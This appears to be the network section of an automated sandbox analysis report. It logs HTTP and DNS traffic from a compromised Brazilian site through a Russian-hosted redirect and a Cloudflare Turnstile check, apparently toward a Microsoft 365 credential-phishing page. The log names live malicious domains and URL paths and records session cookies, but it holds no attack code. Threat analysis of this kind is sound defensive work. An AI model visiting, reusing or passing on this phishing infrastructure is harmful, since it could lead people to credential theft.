Source: global trafficHTTP traffic detected: GET /script/disk/longbow.slidercaptcha.js HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: GET /script/sliderFail.php HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: GET /280/155/?image=13 HTTP/1.1Host: picsum.photosConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://plasticoscorrea.com.brsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yz8E/ HTTP/1.1Host: nokixa.qemitorn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://plasticoscorrea.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nokixa.qemitorn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nokixa.qemitorn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nokixa.qemitorn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://nokixa.qemitorn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://nokixa.qemitorn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff5be739bf042ad&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nokixa.qemitorn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nokixa.qemitorn.ru/yz8E/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InROazA1RE1yVGRRRUJrQ0hydGVZRHc9PSIsInZhbHVlIjoiRTZoUHBYdFhVTnBvUC9kajlDelZuNFdtK1lGUEVIQ1hNdmsrN3FuTjRTN2plVk81d04zblU0Nm1pck53by8zQzBGaGdKWHBnSkVNZjVLTVRsKzVRRUV6UWwyMW5GWDNUVUpMTEMvNGk3bzVabS81R1hwbkpFeTNIREUvQ1cxVWwiLCJtYWMiOiI0NjBlMWI5MGFhN2QyMzlmNzFmMDMyMjViODViM2Q5M2VjMjI2MGUyNzI0YmMzODhiYjk5NWU1ZTg3ZmEyMWY2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFPWkt6R3lnbXZmVTJRd05HTGw1QWc9PSIsInZhbHVlIjoidTgvcytLZmJtTzVOZ3l2T2MzZC92akxJNVBVdU1nS3lIMUtpSkkzUG4rL3g4VWZZR0gvUWkyS3VaNXJtOWRvOEIzSG1nM2VkZzJVWGxVZFIrRk9BWnVOeTZkWEZFS21Zd0owV1RLN3ZCMG5HNTB0eG1jeE4vTVkxQXdBVUs1ZkgiLCJtYWMiOiI0YzQyMzZkMzBhNmRhODI0OTAxNWYyN2U0Y2Y5NjdhZTdhZThjOTE1NjEzNWEzYzBhYTY2OWQyNzc1Y2VkYzdhIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff5be739bf042ad&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ff5be739bf042ad/1736439515896/e1dd5f50336968dc9321d58ea4a711682e2132ee2edae4130f32588e70809f9c/L7iIotAeMgj8B4L HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ff5be739bf042ad/1736439515900/ET6ut0jnLrQZaS9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ff5be739bf042ad/1736439515900/ET6ut0jnLrQZaS9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /XKjHZhHbfYmhpubsmCuWquMukLoqwWivhWWUUTDVQBBOGTVVEMNKETMCNBQCXCWPVJHFKSPUCKFSWACXRDK HTTP/1.1Host: fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://nokixa.qemitorn.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://nokixa.qemitorn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /XKjHZhHbfYmhpubsmCuWquMukLoqwWivhWWUUTDVQBBOGTVVEMNKETMCNBQCXCWPVJHFKSPUCKFSWACXRDK HTTP/1.1Host: fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.teleboario.it
Source: global trafficDNS traffic detected: DNS query: plasticoscorrea.com.br
Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: picsum.photos
Source: global trafficDNS traffic detected: DNS query: fastly.picsum.photos
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nokixa.qemitorn.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /script/sliderFail.php HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveContent-Length: 13sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://plasticoscorrea.com.brSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:18:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2Fl3Y%2Fbp5Cw%2BuuxMrGPbPKsbDSCs%2BGRxG0MfdceJDPz%2BKZscdduUOMQQgynlO9sp%2FOxrD9JZb64R9rWW8tEbyAL0zeFBbG3cJ4BESe6gkARgqStl17cDN%2FfQkcU1Dw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1251&min_rtt=1246&rtt_var=478&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1361&delivery_rate=2204334&cwnd=251&unsent_bytes=0&cid=c8462817a3b4517c&ts=245&x=0"CF-Cache-Status: HITAge: 4642Server: cloudflareCF-RAY: 8ff5be7a6e3c436c-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1757&rtt_var=668&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1898&delivery_rate=1625835&cwnd=228&unsent_bytes=0&cid=c64e35f2dcad04a2&ts=3945&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:18:36 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: pd9gwZwXQGeCLJLhPAQ2U6IddpuU7GY2/RY=$xv/ESnXm3mkqG0TwServer: cloudflareCF-RAY: 8ff5be844e614397-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:18:40 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: HL0fKcSlZJ95okXrpFKclNGs/hUTpZGVTPs=$qoBPAleVPYREfmKKServer: cloudflareCF-RAY: 8ff5be9b0dba18bc-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:19:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: LVCwKfXJz0VYabjKJpVbVY3MOQVjuCdIcEc=$NnKyigS67++krNNkServer: cloudflareCF-RAY: 8ff5bf30ee7d0cbe-EWRalt-svc: h3=":443"; ma=86400
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_244.6.drString found in binary or memory: https://fontawesome.com
Source: chromecache_244.6.drString found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_201.6.dr, chromecache_212.6.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_201.6.dr, chromecache_212.6.drString found in binary or memory: https://login.windows-ppe.net
Source: chromecache_217.6.dr, chromecache_240.6.drString found in binary or memory: https://picsum.photos/
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
